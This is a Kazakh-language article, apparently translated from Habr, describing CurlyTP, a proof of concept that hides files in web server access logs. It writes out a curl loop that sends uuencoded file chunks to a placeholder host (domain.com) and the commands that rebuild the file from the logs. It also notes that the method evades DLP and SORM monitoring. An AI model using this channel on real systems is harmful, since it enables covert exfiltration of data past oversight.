Wikipedia анықтамасына сәйкес, өлі тамшы - бұл құпия орынды пайдаланатын адамдар арасында ақпарат немесе кейбір заттар алмасуға қызмет ететін қастандық құралы. Бұл адамдар ешқашан кездеспейді, бірақ олар операциялық қауіпсіздікті сақтау үшін ақпарат алмасады.

Жасырынатын орын назар аудармауы керек. Сондықтан желіден тыс әлемде олар жиі құпия заттарды пайдаланады: қабырғадағы бос кірпіш, кітапхана кітабы немесе ағаштың қуысы.

Интернетте көптеген шифрлау және анонимдеу құралдары бар, бірақ бұл құралдарды пайдалану фактісінің өзі назар аударады. Бұған қоса, олар корпоративтік немесе үкімет деңгейінде бұғатталуы мүмкін. Не істеу?

Әзірлеуші ​​Ryan Flowers қызықты нұсқаны ұсынды - кез келген веб-серверді жасырыну орны ретінде пайдаланыңыз. Егер сіз бұл туралы ойласаңыз, веб-сервер не істейді? Сұраныстарды қабылдайды, файлдарды шығарады және журналдарды жазады. Ол барлық сұрауларды тіркейді, тіпті дұрыс емес!

Кез келген веб-сервер журналда кез келген дерлік хабарламаны сақтауға мүмкіндік береді екен. Гүлдер мұны қалай пайдалану керектігін ойлады.

Ол мына опцияны ұсынады:

1. Мәтіндік файлды (құпия хабарлама) алыңыз және хэшті (md5sum) есептеңіз.
2. Біз оны кодтаймыз (gzip+uuencode).
3. Біз серверге әдейі қате сұрауды пайдаланып журналға жазамыз.

Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt

[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | sh

Файлды оқу үшін осы әрекеттерді кері ретпен орындау керек: файлды декодтау және разрядтан шығару, хэшті тексеру (хэш ашық арналар арқылы қауіпсіз түрде берілуі мүмкін).

Бос орындар ауыстырылады =+=мекенжайда бос орындар болмауы үшін. Авторы CurlyTP деп атайтын бағдарлама электрондық пошта тіркемелері сияқты base64 кодтауын пайдаланады. Сұраныс кілт сөзбен жасалады ?transfer?алушы оны журналдардан оңай таба алатындай етіп.

Бұл жағдайда журналдардан нені көреміз?

1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"

Жоғарыда айтылғандай, құпия хабарламаны алу үшін әрекеттерді кері ретпен орындау керек:

Remote machine

[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue

[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 g

Процесті автоматтандыру оңай. Md5sum сәйкес келеді және файлдың мазмұны барлығы дұрыс декодталғанын растайды.

Әдіс өте қарапайым. «Бұл жаттығудың мақсаты - файлдарды жазықсыз кішкентай веб-сұраулар арқылы тасымалдауға болатындығын дәлелдеу және ол қарапайым мәтіндік журналдары бар кез келген веб-серверде жұмыс істейді. Негізінде әрбір веб-сервер – жасырынатын орын!» деп жазады Гүлдер.

Әрине, әдіс алушының сервер журналдарына кіру мүмкіндігі болған жағдайда ғана жұмыс істейді. Бірақ мұндай қолжетімділікті, мысалы, көптеген хостерлер қамтамасыз етеді.

Оны қалай пайдалануға болады?

Райан Флоуэрс өзінің ақпараттық қауіпсіздік сарапшысы емес екенін және CurlyTP үшін ықтимал пайдалану тізімін жасамайтынын айтады. Ол үшін бұл біз күнделікті көріп жүрген таныс құралдарды дәстүрлі емес тәсілмен қолдануға болатынын тұжырымдаманың дәлелі ғана.

Шындығында, бұл әдіс басқа серверлерге қарағанда бірқатар артықшылықтарға ие Digital Dead Drop немесе PirateBox: ол сервер жағында арнайы конфигурацияны немесе қандай да бір арнайы хаттамаларды қажет етпейді - және трафикті бақылайтындар арасында күдік тудырмайды. SORM немесе DLP жүйесінің қысылған мәтіндік файлдар үшін URL мекенжайларын сканерлеуі екіталай.

Бұл қызметтік файлдар арқылы хабарламаларды жіберу тәсілдерінің бірі. Кейбір озық компаниялардың қалай орналастырғанын еске түсіре аласыз HTTP тақырыптарындағы әзірлеуші ​​тапсырмалары немесе HTML беттерінің кодында.

Бұл Пасха жұмыртқасын тек веб-әзірлеушілер ғана көреді деген идея болды, өйткені қарапайым адам тақырыптарға немесе HTML кодына қарамайды.

Ақпарат көзі: www.habr.com